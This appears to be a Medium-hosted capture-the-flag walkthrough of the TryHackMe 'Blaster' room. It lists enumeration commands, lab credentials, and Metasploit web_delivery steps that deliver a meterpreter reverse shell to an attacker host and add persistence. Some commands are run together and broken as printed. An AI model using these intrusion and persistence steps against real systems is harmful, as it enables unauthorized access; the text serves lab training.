TryHackMe: Blaster

  1. How many ports are open on our target system?
autorecon <ip>
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi
wpscan --url http://<ip>/retro/ -et -ep -eu
http://<ip>/retro/wp-login.php
Wade : parzival
remmina
  1. When enumerating a machine, it’s often useful to look at what the user was last doing. Look around the machine and see if you can find the CVE which was researched on this server. What CVE was it?
systeminfo
sc query windefend
C:\Windows\System32\cmd.exe  -> Press Enter
cd \Users\Administrator\Desktopdir
type root.txt
  1. Return to your attacker machine for this next bit. Since we know our victim machine is running Windows Defender, let’s go ahead and try a different method of payload delivery! For this, we’ll be using the script web delivery exploit within Metasploit. Launch Metasploit now and select ‘exploit/multi/script/web_delivery’ for use.
msfconsoleuse exploit/multi/script/web_delivery
show targets
set target 2
set lhost <attacker ip>set lport <attacker port>
set payload windows/meterpreter/reverse_httprun -j
show options
set srvport 8000
run -j
run persistence -X
run persistence -X -r <attcker ip>
backgrounduse exploit/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcp  set LHOST <attacker ip>set LPORT 1234 show options
sessions 1reboot

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store